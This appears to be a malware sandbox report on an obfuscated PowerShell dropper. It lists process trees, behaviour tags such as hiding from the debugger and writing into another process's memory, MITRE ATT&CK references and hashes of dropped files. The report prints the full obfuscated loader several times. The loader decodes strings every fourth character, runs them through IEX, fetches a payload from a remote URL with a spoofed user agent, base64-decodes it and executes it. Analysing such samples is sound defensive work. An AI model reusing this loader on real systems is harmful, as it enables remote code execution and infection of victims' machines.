TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1604
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3528
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
266B
MD5b655a0a74150ecba5005b6692b33e745
SHA1191067f7f954ae2656d6ad301f2c9f96405bb596
SHA256a2115d37f1070b98160c24a77f2adf08a47576909dd9ff3160c304cc5823c916
SHA512db3c490e4396317358b64bbeee4b238b216a3a528f9be2daa96bb97ca5d5a618103b6ec0de8be186b460f066fd105705ef46596250e84e9676a83548fe7bddf0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize2KB
MD54b1ca81dd836b31257a7b2fc5917b66d
SHA1aa31478050ddd98febc0306b2d480f548747c04c
SHA25621af393fa491d538d292562779d506d587619c9c251b59025e1d047fb4b90cf6
SHA5126f802746133a6f05569eca76ff8b775b9a322dc697d467fbf145ddac84d2951032d347cbaeae2d38242e6ff3a6fa9acba5db2d664dddaca0687d89c704c4d8cf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize1KB
MD5302258474fedb7c1afea27dc32eb6a65
SHA1d7df1c26658b2540d183e06df4127002c49c1d3d
SHA256a1543c965bf398a82aa887b5a4ba1cc13770ad9b4ea15b3e6fda8566c41879f1
SHA512c44f5aa2d4482b0e95c495c7edd70c78ac9629975a1764edcd8e9bc3ffae12ab83fe53842349f5c62f3d1c6f42bd49673d96ffad2e4a99d5b52a073f701160a9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize482B
MD5db84722ef63bfd361431a60b9108a465
SHA1d739343fc1f465b88fe2be2756ea8d8da34f2baf
SHA256a41e74756218e28131f0ebb5d34c71429b1547fda37e20431a84d0dcc1e006e3
SHA5129505bfdabc882f2d78906a1f54da18dcbd5947be10964832f87897dd205300a8316552c3a1d53767357ff6065736c4f62df9bfc7190f7027a22bc92ed8ccaf9b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize486B
MD59d83a26751399ed437327933c7e95009
SHA1bfd1909cc0877141317f3222fe6e46ba3c7b96d8
SHA256fc815bbe0e3863ee9c64763b062633f241b1684466c06d3e9fabdeee5b9cd0df
SHA512f262d6873c42e7a96efdc31ded38faf2dad3a1b6f341dbbbf04383751d8d46e7d16104f5a2343f57edd196827ac581477a62a532f7a659b338836637a2ddcd46
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
Filesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
Filesize
9KB
MD556f94f8aed310e90b5f513b1eb999c69
SHA195e42e5458cf0117c08de3c6bda83b699fa9be59
SHA256a81393b534b9f803d64ca3d43f9e3b8a184a9e790ac20f2f51d347114384e7a2
SHA512d53890af0815934fb10f4eb3e2eae13da5db60d21a9a89f2426de7bbb5ce7ed495a84a371d8c19ce9b707709b3d18f00bc637262a2d3fc7818333b508af4980e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5562a58578d6d04c7fb6bda581c57c03c
SHA112ab2b88624d01da0c5f5d1441aa21cbc276c5f5
SHA256ff5c70287ba432a83f9015209d6e933462edca01d68c53c09882e1e4d22241c8
SHA5123f6e19faa0196bd4c085defa587e664abdd63c25ef30df8f4323e60a5a5aca3cd2709466f772e64ab00fe331d4264841422d6057451947f3500e9252a132254e
-
Filesize
454KB
MD5d9ef771daefffd6c29cf32f82fc112ad
SHA101097bf85e1c7e90078bd6256b4fd8a2aba1ce20
SHA256aada34a354ca91ac52e7ba0d83fe33d7a2a8c36cd15fb07a1114e6ff90b23d5d
SHA5122a5a5649dfb8852a7245547db8f97eced1a004d013030c96d2adff2cee140ff05003e3b7e9c8adeaedcc8610108c9d77ab6ca5cdfb5939a7298c75aea1f577d9